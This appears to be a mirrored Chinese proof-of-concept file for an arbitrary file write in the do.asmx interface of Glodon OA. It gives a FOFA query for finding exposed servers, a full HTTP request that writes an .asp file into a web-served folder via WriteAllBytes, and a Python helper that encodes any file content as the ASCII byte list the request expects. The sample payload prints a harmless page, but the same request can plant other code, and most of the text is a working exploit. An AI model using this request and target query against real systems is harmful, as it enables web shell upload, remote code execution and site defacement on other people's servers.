admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-05 02:15:30 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/广联达OA/广联达OA系统接口do.asmx存在任意文件写入漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

62 lines
2.6 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 广联达OA系统接口do.asmx存在任意文件写入漏洞
广联达OA系统接口do.asmx存在任意文件写入漏洞允许攻击者上传恶意文件到服务器可能导致远程代码执行、网站篡改或其他形式的攻击严重威胁系统和数据安全。
## fofa
```javascript
body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"
```
## poc
```javascript
POST /m/mobileAction.ashx/do.asmx?controller=Microsoft.VisualBasic.FileIO.FileSystem%2c%20Microsoft.VisualBasic%2c%20Version%3d8.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db03f5f7f11d50a3a&action=WriteAllBytes HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Connection: close
["\"D:\\\\Program Files (x86)\\\\Glodon\\\\GTP\\\\data\\\\gtp-default\\\\FileStorage\\\\UserFiles\\\\1.asp\"","[60, 37, 32, 82, 101, 115, 112, 111, 110, 115, 101, 46, 87, 114, 105, 116, 101, 40, 34, 72, 101, 108, 108, 111, 44, 32, 87, 111, 114, 108, 100, 34, 41, 32, 37, 62]","false"]
```
请求体中的上传路径并不通用需要根据实际环境选择文件的内容需要转换为ASCII码
```python
def ascii_to_char(ascii_codes):
"""将ASCII码列表转换为字符"""
return ''.join(chr(code) for code in ascii_codes)
def char_to_ascii(char):
"""将字符串转换为ASCII码列表"""
return [ord(c) for c in char]
def main():
print("0 字符转ASCII码")
print("1 ASCII码转字符")
choice = input("请选择转换类型0/1: ")
if choice == '0':
# 字符转ASCII码
chars = input("请输入要转换的字符: ")
ascii_codes = char_to_ascii(chars)
print("字符转ASCII码:", ascii_codes)
elif choice == '1':
# ASCII码转字符
ascii_codes_str = input("请输入以逗号分隔的ASCII码例如65,66,67: ")
ascii_codes = [int(code.strip()) for code in ascii_codes_str.split(',')]
converted_chars = ascii_to_char(ascii_codes)
print("ASCII码转字符:", converted_chars)
else:
print("无效的输入请输入0或1。")
if __name__ == "__main__":
main()
```
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409141650271.png)
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409141650535.png)
Reference in New Issue View Git Blame Copy Permalink